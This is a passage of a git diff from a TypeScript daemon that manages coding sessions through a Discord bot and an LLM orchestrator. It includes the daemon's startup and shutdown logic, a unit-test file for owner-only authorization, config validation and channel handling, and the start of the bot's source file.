+  /** Start the daemon: log startup info, register signal handlers, start keepalive. */
+  async start(): Promise<void> {
+    this.sessionManager = new SessionManager(this.logger);
+
+    this.logger.info('daemon started', {
+      log_level: this.config.log.level,
+      scan_roots: this.config.projects.scan_roots.length,
+      discord_configured: !!this.config.discord,
+    });
+
+    process.on('SIGTERM', this.onSigterm);
+    process.on('SIGINT', this.onSigint);
+
+    // Keep the event loop alive. The write stream alone doesn't hold a ref
+    // when there's no pending I/O, so we need an explicit timer.
+    this.keepaliveTimer = setInterval(() => {}, 60_000);
+
+    // Conditionally start Discord bot if config is present and valid
+    if (this.config.discord?.token) {
+      try {
+        validateDiscordConfig(this.config.discord);
+        this.discordBot = new DiscordBot({
+          config: this.config.discord,
+          logger: this.logger,
+          sessionManager: this.sessionManager,
+          scanProjects: () => this.scanProjects(),
+        });
+        await this.discordBot.login();
+
+        // Wire up EventBridge after bot is ready
+        const channelManager = this.discordBot.getChannelManager();
+        const client = this.discordBot.getClient();
+        if (channelManager && client) {
+          this.eventBridge = new EventBridge({
+            sessionManager: this.sessionManager,
+            channelManager,
+            client,
+            config: this.config,
+            logger: this.logger,
+            ownerId: this.config.discord.owner_id,
+          });
+          this.discordBot.setEventBridge(this.eventBridge);
+          this.eventBridge.start();
+          this.logger.info('event bridge wired');
+
+          // Wire up Orchestrator if control_channel_id is configured
+          if (this.config.discord.control_channel_id) {
+            this.orchestrator = new Orchestrator({
+              sessionManager: this.sessionManager,
+              channelManager,
+              scanProjects: () => this.scanProjects(),
+              config: {
+                model: this.config.discord.orchestrator?.model ?? 'claude-haiku-4-5-20251001',
+                max_tokens: this.config.discord.orchestrator?.max_tokens ?? 1024,
+                control_channel_id: this.config.discord.control_channel_id,
+              },
+              logger: this.logger,
+              ownerId: this.config.discord.owner_id,
+            });
+            client.on('messageCreate', (message) => {
+              void this.orchestrator!.handleMessage(message);
+            });
+            this.logger.info('orchestrator wired', {
+              control_channel_id: this.config.discord.control_channel_id,
+            });
+          }
+        } else {
+          this.logger.warn('event bridge skipped — channel manager or client not available');
+        }
+      } catch (err) {
+        // Log error but don't abort daemon startup — bot is optional
+        this.logger.error('discord bot login failed', {
+          error: err instanceof Error ? err.message : String(err),
+        });
+        this.discordBot = undefined;
+      }
+    }
+
+    // Health heartbeat — logs uptime, session count, Discord status, memory
+    const startTime = Date.now();
+    this.healthTimer = setInterval(() => {
+      const sessions = this.sessionManager?.getAllSessions() ?? [];
+      const activeSessions = sessions.filter(
+        (s) => s.status === 'running' || s.status === 'blocked',
+      ).length;
+      this.logger.info('health', {
+        uptime_s: Math.floor((Date.now() - startTime) / 1000),
+        active_sessions: activeSessions,
+        discord_connected: !!this.discordBot?.getClient()?.isReady(),
+        memory_rss_mb: Math.round(process.memoryUsage().rss / 1024 / 1024),
+      });
+    }, this.healthIntervalMs);
+  }
+
+  /** Scan configured project roots for project directories. */
+  async scanProjects(): Promise<ProjectInfo[]> {
+    return scanForProjects(this.config.projects.scan_roots);
+  }
+
+  /** Accessor for the session manager (available after start()). */
+  getSessionManager(): SessionManager {
+    if (!this.sessionManager) {
+      throw new Error('Daemon not started — call start() before accessing the session manager');
+    }
+    return this.sessionManager;
+  }
+
+  /** Accessor for the event bridge (available after start() with Discord configured). */
+  getEventBridge(): EventBridge | undefined {
+    return this.eventBridge;
+  }
+
+  /** Accessor for the orchestrator (available after start() with control_channel_id configured). */
+  getOrchestrator(): Orchestrator | undefined {
+    return this.orchestrator;
+  }
+
+  /** Idempotent shutdown: log, cleanup sessions, close logger, exit. */
+  async shutdown(): Promise<void> {
+    if (this.shuttingDown) return;
+    this.shuttingDown = true;
+
+    this.logger.info('daemon shutting down');
+
+    // Remove signal handlers to avoid double-fire
+    process.removeListener('SIGTERM', this.onSigterm);
+    process.removeListener('SIGINT', this.onSigint);
+
+    // Clear health heartbeat timer
+    if (this.healthTimer) {
+      clearInterval(this.healthTimer);
+      this.healthTimer = undefined;
+    }
+
+    // Clear keepalive so the event loop can drain
+    if (this.keepaliveTimer) {
+      clearInterval(this.keepaliveTimer);
+      this.keepaliveTimer = undefined;
+    }
+
+    // Stop Orchestrator first
+    if (this.orchestrator) {
+      this.orchestrator.stop();
+      this.orchestrator = undefined;
+    }
+
+    // Stop EventBridge before Discord bot destroy
+    if (this.eventBridge) {
+      await this.eventBridge.stop();
+      this.eventBridge = undefined;
+    }
+
+    // Destroy Discord bot before session cleanup
+    if (this.discordBot) {
+      await this.discordBot.destroy();
+      this.discordBot = undefined;
+    }
+
+    // Clean up active sessions before closing logger
+    if (this.sessionManager) {
+      await this.sessionManager.cleanup();
+    }
+
+    await this.logger.close();
+    process.exit(0);
+  }
+}
diff --git a/packages/daemon/src/discord-bot.test.ts b/packages/daemon/src/discord-bot.test.ts
new file mode 100644
index 000000000..e450fd885
--- /dev/null
+++ b/packages/daemon/src/discord-bot.test.ts
@@ -0,0 +1,792 @@
+import { describe, it, afterEach } from 'node:test';
+import assert from 'node:assert/strict';
+import { mkdtempSync, readFileSync, rmSync, existsSync } from 'node:fs';
+import { join } from 'node:path';
+import { tmpdir } from 'node:os';
+import { randomUUID } from 'node:crypto';
+import { ChannelType } from 'discord.js';
+import { isAuthorized, validateDiscordConfig } from './discord-bot.js';
+import { sanitizeChannelName, ChannelManager } from './channel-manager.js';
+import { buildCommands, formatSessionStatus } from './commands.js';
+import { Daemon } from './daemon.js';
+import { Logger } from './logger.js';
+import { validateConfig } from './config.js';
+import type { DaemonConfig, LogEntry, ManagedSession } from './types.js';
+
+// ---------- helpers ----------
+
+function tmpDir(): string {
+  return mkdtempSync(join(tmpdir(), `discord-test-${randomUUID().slice(0, 8)}-`));
+}
+
+const cleanupDirs: string[] = [];
+afterEach(() => {
+  while (cleanupDirs.length) {
+    const d = cleanupDirs.pop()!;
+    if (existsSync(d)) rmSync(d, { recursive: true, force: true });
+  }
+});
+
+// ---------- isAuthorized ----------
+
+describe('isAuthorized', () => {
+  it('returns true when userId matches ownerId', () => {
+    assert.equal(isAuthorized('12345', '12345'), true);
+  });
+
+  it('returns false when userId does not match ownerId', () => {
+    assert.equal(isAuthorized('12345', '99999'), false);
+  });
+
+  it('returns false when ownerId is empty', () => {
+    assert.equal(isAuthorized('12345', ''), false);
+  });
+
+  it('returns false when userId is empty', () => {
+    assert.equal(isAuthorized('', '12345'), false);
+  });
+
+  it('returns false when both are empty', () => {
+    assert.equal(isAuthorized('', ''), false);
+  });
+});
+
+// ---------- validateDiscordConfig ----------
+
+describe('validateDiscordConfig', () => {
+  it('passes with all required fields', () => {
+    assert.doesNotThrow(() => {
+      validateDiscordConfig({
+        token: 'test-token',
+        guild_id: 'g123',
+        owner_id: 'o456',
+      });
+    });
+  });
+
+  it('throws on undefined config', () => {
+    assert.throws(
+      () => validateDiscordConfig(undefined),
+      (err: Error) => {
+        assert.ok(err.message.includes('undefined'));
+        return true;
+      },
+    );
+  });
+
+  it('throws on missing token', () => {
+    assert.throws(
+      () => validateDiscordConfig({ token: '', guild_id: 'g1', owner_id: 'o1' }),
+      (err: Error) => {
+        assert.ok(err.message.includes('token'));
+        return true;
+      },
+    );
+  });
+
+  it('throws on whitespace-only token', () => {
+    assert.throws(
+      () => validateDiscordConfig({ token: '   ', guild_id: 'g1', owner_id: 'o1' }),
+      (err: Error) => {
+        assert.ok(err.message.includes('token'));
+        return true;
+      },
+    );
+  });
+
+  it('throws on missing guild_id', () => {
+    assert.throws(
+      () => validateDiscordConfig({ token: 'tok', guild_id: '', owner_id: 'o1' }),
+      (err: Error) => {
+        assert.ok(err.message.includes('guild_id'));
+        return true;
+      },
+    );
+  });
+
+  it('throws on missing owner_id', () => {
+    assert.throws(
+      () => validateDiscordConfig({ token: 'tok', guild_id: 'g1', owner_id: '' }),
+      (err: Error) => {
+        assert.ok(err.message.includes('owner_id'));
+        return true;
+      },
+    );
+  });
+});
+
+// ---------- Daemon wiring ----------
+
+describe('Daemon + DiscordBot wiring', () => {
+  it('does not create DiscordBot when discord config is absent', async () => {
+    const dir = tmpDir();
+    cleanupDirs.push(dir);
+    const logPath = join(dir, 'no-discord.log');
+
+    const config: DaemonConfig = {
+      discord: undefined,
+      projects: { scan_roots: [] },
+      log: { file: logPath, level: 'debug', max_size_mb: 50 },
+    };
+
+    const logger = new Logger({ filePath: logPath, level: 'debug' });
+    const daemon = new Daemon(config, logger);
+
+    await daemon.start();
+
+    const origExit = process.exit;
+    // @ts-expect-error — overriding process.exit for test
+    process.exit = () => {};
+    try {
+      await daemon.shutdown();
+    } finally {
+      process.exit = origExit;
+    }
+
+    const content = readFileSync(logPath, 'utf-8');
+    // Should NOT have any bot-related log entries
+    assert.ok(!content.includes('bot ready'));
+    assert.ok(!content.includes('discord bot login failed'));
+    assert.ok(!content.includes('bot destroyed'));
+  });
+
+  it('logs error when discord config has token but login fails (no real gateway)', async () => {
+    const dir = tmpDir();
+    cleanupDirs.push(dir);
+    const logPath = join(dir, 'bad-token.log');
+
+    const config: DaemonConfig = {
+      discord: {
+        token: 'invalid-token-that-will-fail-login',
+        guild_id: 'g1',
+        owner_id: 'o1',
+      },
+      projects: { scan_roots: [] },
+      log: { file: logPath, level: 'debug', max_size_mb: 50 },
+    };
+
+    const logger = new Logger({ filePath: logPath, level: 'debug' });
+    const daemon = new Daemon(config, logger);
+
+    // start() should NOT throw — bot login failure is non-fatal
+    await daemon.start();
+
+    const origExit = process.exit;
+    // @ts-expect-error — overriding process.exit for test
+    process.exit = () => {};
+    try {
+      await daemon.shutdown();
+    } finally {
+      process.exit = origExit;
+    }
+
+    // Small flush delay
+    await new Promise((r) => setTimeout(r, 50));
+
+    const content = readFileSync(logPath, 'utf-8');
+    // Should have logged the login failure
+    assert.ok(content.includes('discord bot login failed'), 'should log bot login failure');
+    // Token should never appear in logs
+    assert.ok(!content.includes('invalid-token-that-will-fail-login'), 'token must not appear in logs');
+  });
+
+  it('does not attempt login when discord config has no token', async () => {
+    const dir = tmpDir();
+    cleanupDirs.push(dir);
+    const logPath = join(dir, 'no-token.log');
+
+    // Config with discord block but empty token
+    const config: DaemonConfig = {
+      discord: {
+        token: '',
+        guild_id: 'g1',
+        owner_id: 'o1',
+      },
+      projects: { scan_roots: [] },
+      log: { file: logPath, level: 'debug', max_size_mb: 50 },
+    };
+
+    const logger = new Logger({ filePath: logPath, level: 'debug' });
+    const daemon = new Daemon(config, logger);
+
+    await daemon.start();
+
+    const origExit = process.exit;
+    // @ts-expect-error — overriding process.exit for test
+    process.exit = () => {};
+    try {
+      await daemon.shutdown();
+    } finally {
+      process.exit = origExit;
+    }
+
+    const content = readFileSync(logPath, 'utf-8');
+    // Should not attempt login — no token
+    assert.ok(!content.includes('discord bot login failed'));
+    assert.ok(!content.includes('bot ready'));
+  });
+});
+
+// ---------- sanitizeChannelName ----------
+
+describe('sanitizeChannelName', () => {
+  it('converts basic path to gsd-prefixed name', () => {
+    assert.equal(sanitizeChannelName('/home/user/my-project'), 'gsd-my-project');
+  });
+
+  it('converts path with special characters to hyphens', () => {
+    assert.equal(sanitizeChannelName('/home/user/My_Cool.Project!v2'), 'gsd-my-cool-project-v2');
+  });
+
+  it('truncates very long names to 100 chars', () => {
+    const longName = 'a'.repeat(200);
+    const result = sanitizeChannelName(`/home/${longName}`);
+    assert.ok(result.length <= 100, `Expected <= 100 chars, got ${result.length}`);
+    assert.ok(result.startsWith('gsd-'));
+  });
+
+  it('cleans leading/trailing dots and underscores', () => {
+    assert.equal(sanitizeChannelName('/home/...___project___...'), 'gsd-project');
+  });
+
+  it('returns gsd-unnamed for empty basename', () => {
+    assert.equal(sanitizeChannelName(''), 'gsd-unnamed');
+    assert.equal(sanitizeChannelName('/'), 'gsd-unnamed');
+  });
+
+  it('returns gsd-unnamed for basename with only special chars', () => {
+    assert.equal(sanitizeChannelName('/home/!!!'), 'gsd-unnamed');
+  });
+
+  it('collapses consecutive hyphens', () => {
+    assert.equal(sanitizeChannelName('/home/a---b---c'), 'gsd-a-b-c');
+  });
+
+  it('handles Windows-style backslash paths', () => {
+    assert.equal(sanitizeChannelName('C:\\Users\\lex\\my-project'), 'gsd-my-project');
+  });
+
+  it('handles name at exact prefix + 96 chars = 100 char limit', () => {
+    // gsd- is 4 chars, so a 96-char basename should produce exactly 100
+    const name96 = 'a'.repeat(96);
+    const result = sanitizeChannelName(`/home/${name96}`);
+    assert.equal(result.length, 100);
+    assert.equal(result, `gsd-${'a'.repeat(96)}`);
+  });
+
+  it('handles whitespace-only basename', () => {
+    assert.equal(sanitizeChannelName('/home/   '), 'gsd-unnamed');
+  });
+});
+
+// ---------- ChannelManager ----------
+
+describe('ChannelManager', () => {
+  // Helper to create a mock Guild with controllable channel cache and create method
+  function createMockGuild() {
+    const channels = new Map<string, { id: string; name: string; type: number; parentId: string | null; edit?: Function }>();
+    let createCounter = 0;
+
+    const mockGuild = {
+      id: 'guild-123', // @everyone role ID matches guild ID
+      channels: {
+        cache: {
+          get: (id: string) => channels.get(id),
+          find: (fn: (ch: any) => boolean) => {
+            for (const ch of channels.values()) {
+              if (fn(ch)) return ch;
+            }
+            return undefined;
+          },
+        },
+        create: async (opts: { name: string; type: number; parent?: string; permissionOverwrites?: any[] }) => {
+          createCounter++;
+          const id = `chan-${createCounter}`;
+          const ch = {
+            id,
+            name: opts.name,
+            type: opts.type,
+            parentId: opts.parent ?? null,
+            edit: async (editOpts: any) => {
+              // Simulate edit — update parent
+              ch.parentId = editOpts.parent ?? ch.parentId;
+              return ch;
+            },
+          };
+          channels.set(id, ch);
+          return ch;
+        },
+      },
+      _channels: channels, // internal for test inspection
+      _getCreateCount: () => createCounter,
+    };
+
+    return mockGuild;
+  }
+
+  function createMockLogger() {
+    const entries: { level: string; msg: string; data?: any }[] = [];
+    return {
+      debug: (msg: string, data?: any) => entries.push({ level: 'debug', msg, data }),
+      info: (msg: string, data?: any) => entries.push({ level: 'info', msg, data }),
+      warn: (msg: string, data?: any) => entries.push({ level: 'warn', msg, data }),
+      error: (msg: string, data?: any) => entries.push({ level: 'error', msg, data }),
+      entries,
+      close: async () => {},
+    };
+  }
+
+  it('resolveCategory creates category when not found', async () => {
+    const guild = createMockGuild();
+    const logger = createMockLogger();
+    const mgr = new ChannelManager({ guild: guild as any, logger: logger as any });
+
+    const cat = await mgr.resolveCategory();
+    assert.equal(cat.name, 'GSD Projects');
+    assert.equal(cat.type, ChannelType.GuildCategory);
+  });
+
+  it('resolveCategory returns cached category on second call', async () => {
+    const guild = createMockGuild();
+    const logger = createMockLogger();
+    const mgr = new ChannelManager({ guild: guild as any, logger: logger as any });
+
+    const cat1 = await mgr.resolveCategory();
+    const cat2 = await mgr.resolveCategory();
+    assert.equal(cat1.id, cat2.id);
+    // Only one create call should have been made
+    assert.equal(guild._getCreateCount(), 1);
+  });
+
+  it('resolveCategory finds existing category by name', async () => {
+    const guild = createMockGuild();
+    // Pre-populate a matching category
+    guild._channels.set('existing-cat', {
+      id: 'existing-cat',
+      name: 'GSD Projects',
+      type: ChannelType.GuildCategory,
+      parentId: null,
+    });
+
+    const logger = createMockLogger();
+    const mgr = new ChannelManager({ guild: guild as any, logger: logger as any });
+
+    const cat = await mgr.resolveCategory();
+    assert.equal(cat.id, 'existing-cat');
+    // No create calls — found existing
+    assert.equal(guild._getCreateCount(), 0);
+  });
+
+  it('createProjectChannel creates text channel under category', async () => {
+    const guild = createMockGuild();
+    const logger = createMockLogger();
+    const mgr = new ChannelManager({ guild: guild as any, logger: logger as any });
+
+    const channel = await mgr.createProjectChannel('/home/user/my-project');
+    assert.equal(channel.name, 'gsd-my-project');
+    assert.equal(channel.type, ChannelType.GuildText);
+    // Category was created first (chan-1), then channel (chan-2)
+    assert.equal(channel.parentId, 'chan-1');
+  });
+
+  it('archiveChannel moves channel to archive category', async () => {
+    const guild = createMockGuild();
+    const logger = createMockLogger();
+    const mgr = new ChannelManager({ guild: guild as any, logger: logger as any });
+
+    // Create a project channel first
+    const channel = await mgr.createProjectChannel('/home/user/project');
+    const channelId = channel.id;
+
+    // Archive it
+    await mgr.archiveChannel(channelId);
+
+    // The channel should have been edit()-ed with the archive category as parent
+    const archived = guild._channels.get(channelId)!;
+    // Archive category was created as the 3rd channel (chan-3): category(chan-1), text(chan-2), archive(chan-3)
+    assert.equal(archived.parentId, 'chan-3');
+
+    // Verify archive log
+    const archiveLog = logger.entries.find((e) => e.msg === 'channel archived');
+    assert.ok(archiveLog, 'should log channel archived');
+    assert.equal(archiveLog!.data.channelId, channelId);
+  });
+
+  it('archiveChannel warns when channel not found', async () => {
+    const guild = createMockGuild();
+    const logger = createMockLogger();
+    const mgr = new ChannelManager({ guild: guild as any, logger: logger as any });
+
+    await mgr.archiveChannel('nonexistent-id');
+    const warnLog = logger.entries.find((e) => e.msg === 'archive target not found');
+    assert.ok(warnLog, 'should warn about missing channel');
+  });
+
+  it('uses custom category name when provided', async () => {
+    const guild = createMockGuild();
+    const logger = createMockLogger();
+    const mgr = new ChannelManager({
+      guild: guild as any,
+      logger: logger as any,
+      categoryName: 'Custom Category',
+    });
+
+    const cat = await mgr.resolveCategory();
+    assert.equal(cat.name, 'Custom Category');
+  });
+});
+
+// ---------- buildCommands ----------
+
+describe('buildCommands', () => {
+  it('returns array with correct command names', () => {
+    const commands = buildCommands();
+    assert.equal(commands.length, 4);
+    const names = commands.map((c) => c.name);
+    assert.ok(names.includes('gsd-status'), 'should include gsd-status');
+    assert.ok(names.includes('gsd-start'), 'should include gsd-start');
+    assert.ok(names.includes('gsd-stop'), 'should include gsd-stop');
+    assert.ok(names.includes('gsd-verbose'), 'should include gsd-verbose');
+  });
+
+  it('each command has a description', () => {
+    const commands = buildCommands();
+    for (const cmd of commands) {
+      assert.ok(cmd.description, `command ${cmd.name} should have a description`);
+      assert.ok(cmd.description.length > 0, `command ${cmd.name} description should be non-empty`);
+    }
+  });
+});
+
+// ---------- formatSessionStatus ----------
+
+describe('formatSessionStatus', () => {
+  function mockSession(overrides: Partial<ManagedSession> = {}): ManagedSession {
+    return {
+      sessionId: 'sess-1',
+      projectDir: '/home/user/project',
+      projectName: 'project',
+      status: 'running',
+      client: {} as any,
+      events: [],
+      pendingBlocker: null,
+      cost: { totalCost: 0.1234, tokens: { input: 100, output: 50, cacheRead: 0, cacheWrite: 0 } },
+      startTime: Date.now() - 120_000, // 2 minutes ago
+      ...overrides,
+    };
+  }
+
+  it('returns "No active sessions." for empty array', () => {
+    assert.equal(formatSessionStatus([]), 'No active sessions.');
+  });
+
+  it('formats single session with project name and status', () => {
+    const result = formatSessionStatus([mockSession()]);
+    assert.ok(result.includes('project'), 'should contain project name');
+    assert.ok(result.includes('running'), 'should contain status');
+    assert.ok(result.includes('$'), 'should contain cost');
+  });
+
+  it('formats multiple sessions on separate lines', () => {
+    const sessions = [
+      mockSession({ projectName: 'alpha', status: 'running' }),
+      mockSession({ projectName: 'beta', status: 'blocked' }),
+    ];
+    const result = formatSessionStatus(sessions);
+    assert.ok(result.includes('alpha'), 'should contain first project');
+    assert.ok(result.includes('beta'), 'should contain second project');
+    const lines = result.split('\n');
+    assert.equal(lines.length, 2, 'should have one line per session');
+  });
+
+  it('formats 5 sessions correctly', () => {
+    const sessions = Array.from({ length: 5 }, (_, i) =>
+      mockSession({ projectName: `proj-${i}`, status: i % 2 === 0 ? 'running' : 'completed' }),
+    );
+    const result = formatSessionStatus(sessions);
+    const lines = result.split('\n');
+    assert.equal(lines.length, 5);
+    for (let i = 0; i < 5; i++) {
+      assert.ok(lines[i].includes(`proj-${i}`));
+    }
+  });
+});
+
+// ---------- Command dispatch (mock interaction) ----------
+
+describe('command dispatch', () => {
+  // Minimal mock of a ChatInputCommandInteraction
+  function mockInteraction(commandName: string, userId: string = 'owner-1') {
+    let replied = false;
+    let replyContent = '';
+
+    return {
+      user: { id: userId },
+      type: 2, // InteractionType.ApplicationCommand
+      isChatInputCommand: () => true,
+      commandName,
+      reply: async (opts: { content: string; ephemeral?: boolean }) => {
+        replied = true;
+        replyContent = opts.content;
+      },
+      _getReplied: () => replied,
+      _getReplyContent: () => replyContent,
+    };
+  }
+
+  // Minimal mock of a non-command interaction
+  function mockNonCommandInteraction(userId: string = 'owner-1') {
+    let replied = false;
+    return {
+      user: { id: userId },
+      type: 3, // InteractionType.MessageComponent
+      isChatInputCommand: () => false,
+      _getReplied: () => replied,
+    };
+  }
+
+  // We can't easily test through DiscordBot.handleInteraction since it's private.
+  // Instead, test the pure functions that the handler calls, and test auth guard
+  // behavior via the mock interaction flow.
+  // The command routing logic is tested indirectly through integration of the
+  // pure helpers (buildCommands, formatSessionStatus, isAuthorized).
+
+  it('gsd-status with no sessions produces empty message', () => {
+    // Tests the formatSessionStatus path that /gsd-status calls
+    const result = formatSessionStatus([]);
+    assert.equal(result, 'No active sessions.');
+  });
+
+  it('unknown command name is not in buildCommands list', () => {
+    const commands = buildCommands();
+    const names = commands.map((c) => c.name);
+    assert.ok(!names.includes('gsd-unknown'), 'unknown should not be in command list');
+  });
+
+  it('auth guard rejects non-owner on interaction', () => {
+    // Simulates the first check in handleInteraction
+    const authorized = isAuthorized('intruder-999', 'owner-1');
+    assert.equal(authorized, false);
+  });
+
+  it('auth guard accepts owner on interaction', () => {
+    const authorized = isAuthorized('owner-1', 'owner-1');
+    assert.equal(authorized, true);
+  });
+});
+
+// ---------- Config validation: new fields ----------
+
+describe('validateConfig — control_channel_id and orchestrator', () => {
+  it('parses control_channel_id from discord block', () => {
+    const config = validateConfig({
+      discord: {
+        token: 'tok',
+        guild_id: 'g1',
+        owner_id: 'o1',
+        control_channel_id: 'ch-123',
+      },
+    });
+    assert.equal(config.discord?.control_channel_id, 'ch-123');
+  });
+
+  it('omits control_channel_id when not present', () => {
+    const config = validateConfig({
+      discord: {
+        token: 'tok',
+        guild_id: 'g1',
+        owner_id: 'o1',
+      },
+    });
+    assert.equal(config.discord?.control_channel_id, undefined);
+  });
+
+  it('parses orchestrator model and max_tokens', () => {
+    const config = validateConfig({
+      discord: {
+        token: 'tok',
+        guild_id: 'g1',
+        owner_id: 'o1',
+        orchestrator: { model: 'claude-opus-2025', max_tokens: 2048 },
+      },
+    });
+    assert.equal(config.discord?.orchestrator?.model, 'claude-opus-2025');
+    assert.equal(config.discord?.orchestrator?.max_tokens, 2048);
+  });
+
+  it('missing orchestrator block results in undefined', () => {
+    const config = validateConfig({
+      discord: {
+        token: 'tok',
+        guild_id: 'g1',
+        owner_id: 'o1',
+      },
+    });
+    assert.equal(config.discord?.orchestrator, undefined);
+  });
+
+  it('empty orchestrator block has no model or max_tokens', () => {
+    const config = validateConfig({
+      discord: {
+        token: 'tok',
+        guild_id: 'g1',
+        owner_id: 'o1',
+        orchestrator: {},
+      },
+    });
+    // orchestrator object should exist but with no values set
+    assert.ok(config.discord?.orchestrator !== undefined);
+    assert.equal(config.discord?.orchestrator?.model, undefined);
+    assert.equal(config.discord?.orchestrator?.max_tokens, undefined);
+  });
+
+  it('ignores non-numeric max_tokens', () => {
+    const config = validateConfig({
+      discord: {
+        token: 'tok',
+        guild_id: 'g1',
+        owner_id: 'o1',
+        orchestrator: { max_tokens: 'not a number' },
+      },
+    });
+    assert.equal(config.discord?.orchestrator?.max_tokens, undefined);
+  });
+
+  it('ignores non-string model', () => {
+    const config = validateConfig({
+      discord: {
+        token: 'tok',
+        guild_id: 'g1',
+        owner_id: 'o1',
+        orchestrator: { model: 42 },
+      },
+    });
+    assert.equal(config.discord?.orchestrator?.model, undefined);
+  });
+});
+
+// ---------- Daemon wiring: orchestrator ----------
+
+describe('Daemon orchestrator wiring', () => {
+  it('orchestrator is undefined when control_channel_id is not set', async () => {
+    const dir = tmpDir();
+    cleanupDirs.push(dir);
+    const logPath = join(dir, 'no-orchestrator.log');
+
+    const config: DaemonConfig = {
+      discord: undefined,
+      projects: { scan_roots: [] },
+      log: { file: logPath, level: 'debug', max_size_mb: 50 },
+    };
+
+    const logger = new Logger({ filePath: logPath, level: 'debug' });
+    const daemon = new Daemon(config, logger);
+
+    await daemon.start();
+    assert.equal(daemon.getOrchestrator(), undefined);
+
+    const origExit = process.exit;
+    // @ts-expect-error — overriding process.exit for test
+    process.exit = () => {};
+    try {
+      await daemon.shutdown();
+    } finally {
+      process.exit = origExit;
+    }
+  });
+
+  it('orchestrator is undefined when discord has no control_channel_id', async () => {
+    // Even with a discord block that fails login, orchestrator should not be created
+    // because there's no control_channel_id
+    const dir = tmpDir();
+    cleanupDirs.push(dir);
+    const logPath = join(dir, 'no-ctl-chan.log');
+
+    const config: DaemonConfig = {
+      discord: {
+        token: 'bad-token',
+        guild_id: 'g1',
+        owner_id: 'o1',
+        // control_channel_id intentionally omitted
+      },
+      projects: { scan_roots: [] },
+      log: { file: logPath, level: 'debug', max_size_mb: 50 },
+    };
+
+    const logger = new Logger({ filePath: logPath, level: 'debug' });
+    const daemon = new Daemon(config, logger);
+
+    await daemon.start();
+    // Login fails, so orchestrator can't be wired regardless. But the code path
+    // that checks control_channel_id comes after successful login/eventBridge wiring.
+    // Since login fails, orchestrator is undefined.
+    assert.equal(daemon.getOrchestrator(), undefined);
+
+    const origExit = process.exit;
+    // @ts-expect-error — overriding process.exit for test
+    process.exit = () => {};
+    try {
+      await daemon.shutdown();
+    } finally {
+      process.exit = origExit;
+    }
+  });
+});
+
+// ---------- /gsd-start and /gsd-stop logic paths ----------
+
+describe('/gsd-start and /gsd-stop logic', () => {
+  // These test the observable logic paths exercised by the handlers.
+  // Since handleGsdStart/handleGsdStop are private, we test the data layer
+  // they depend on — project scanning, session listing, and edge cases.
+
+  it('/gsd-start: scanForProjects returning 0 projects', async () => {
+    // Simulates the "no projects" path
+    const { scanForProjects } = await import('./project-scanner.js');
+    // With no scan roots, should return empty
+    const projects = await scanForProjects([]);
+    assert.equal(projects.length, 0);
+  });
+
+  it('/gsd-stop: getAllSessions returns empty when no sessions active', async () => {
+    const { SessionManager } = await import('./session-manager.js');
+    const dir = tmpDir();
+    cleanupDirs.push(dir);
+    const logPath = join(dir, 'sm-test.log');
+    const logger = new Logger({ filePath: logPath, level: 'debug' });
+    const sm = new SessionManager(logger);
+    const sessions = sm.getAllSessions();
+    assert.equal(sessions.length, 0);
+    await logger.close();
+  });
+
+  it('/gsd-stop: filters to active sessions only', () => {
+    // Simulate the filter logic used in handleGsdStop
+    const allSessions: Partial<ManagedSession>[] = [
+      { sessionId: 's1', status: 'running', projectName: 'alpha' },
+      { sessionId: 's2', status: 'completed', projectName: 'beta' },
+      { sessionId: 's3', status: 'blocked', projectName: 'gamma' },
+      { sessionId: 's4', status: 'error', projectName: 'delta' },
+      { sessionId: 's5', status: 'starting', projectName: 'epsilon' },
+      { sessionId: 's6', status: 'cancelled', projectName: 'zeta' },
+    ];
+    const active = allSessions.filter(
+      (s) => s.status === 'running' || s.status === 'blocked' || s.status === 'starting',
+    );
+    assert.equal(active.length, 3);
+    assert.deepEqual(active.map((s) => s.projectName), ['alpha', 'gamma', 'epsilon']);
+  });
+
+  it('/gsd-start: >25 projects are truncated for select menu', () => {
+    // Simulate the truncation logic
+    const projects = Array.from({ length: 30 }, (_, i) => ({
+      name: `project-${i}`,
+      path: `/home/user/project-${i}`,
+      markers: [] as string[],
+      lastModified: Date.now(),
+    }));
+    const truncated = projects.slice(0, 25);
+    assert.equal(truncated.length, 25);
+    assert.equal(truncated[24].name, 'project-24');
+  });
+});
diff --git a/packages/daemon/src/discord-bot.ts b/packages/daemon/src/discord-bot.ts
new file mode 100644
index 000000000..e4c302354
--- /dev/null
+++ b/packages/daemon/src/discord-bot.ts
@@ -0,0 +1,491 @@
+/**
+ * DiscordBot — wraps discord.js Client with login/destroy lifecycle, auth guard,
+ * and integration with the daemon's SessionManager.
+ *
+ * Auth model (D016): single Discord user ID allowlist. All non-owner interactions
+ * silently ignored; rejections logged at debug level (userId only, no PII).
+ */
+
+import {
+  Client,
+  GatewayIntentBits,
+  REST,
+  StringSelectMenuBuilder,
+  ActionRowBuilder,
+  ComponentType,
+  type Interaction,
+  type Guild,
+  type StringSelectMenuInteraction,
+} from 'discord.js';
+import type { DaemonConfig, VerbosityLevel, ProjectInfo } from './types.js';
+import type { Logger } from './logger.js';
+import type { SessionManager } from './session-manager.js';
+import { ChannelManager } from './channel-manager.js';
+import { buildCommands, registerGuildCommands, formatSessionStatus } from './commands.js';
+import type { EventBridge } from './event-bridge.js';
+
+// ---------------------------------------------------------------------------
+// Pure helpers — exported for testability
+// ---------------------------------------------------------------------------
+
+/**
+ * Auth guard: returns true iff userId matches the configured owner_id.
+ * Rejects empty or missing ownerId to fail closed.
+ */
+export function isAuthorized(userId: string, ownerId: string): boolean {
+  if (!ownerId || !userId) return false;
+  return userId === ownerId;
+}
+
+/**
+ * Validates that all required discord config fields are present.
+ * Throws with a descriptive message on the first missing field.
+ */
+export function validateDiscordConfig(
+  config: DaemonConfig['discord'],
+): asserts config is NonNullable<DaemonConfig['discord']> {
+  if (!config) {
+    throw new Error('Discord config is undefined');
+  }
+  if (!config.token || config.token.trim() === '') {
+    throw new Error('Discord config missing required field: token');
+  }
+  if (!config.guild_id || config.guild_id.trim() === '') {
+    throw new Error('Discord config missing required field: guild_id');
+  }
+  if (!config.owner_id || config.owner_id.trim() === '') {
+    throw new Error('Discord config missing required field: owner_id');
+  }
+}
+
+// ---------------------------------------------------------------------------
+// DiscordBot class
+// ---------------------------------------------------------------------------
+
+export interface DiscordBotOptions {
+  config: NonNullable<DaemonConfig['discord']>;
+  logger: Logger;
+  sessionManager: SessionManager;
+  /** Optional function to scan for projects (passed from Daemon). */
+  scanProjects?: () => Promise<ProjectInfo[]>;
+}
+
+export class DiscordBot {
+  private client: Client | null = null;
+  private destroyed = false;
+  private channelManager: ChannelManager | null = null;
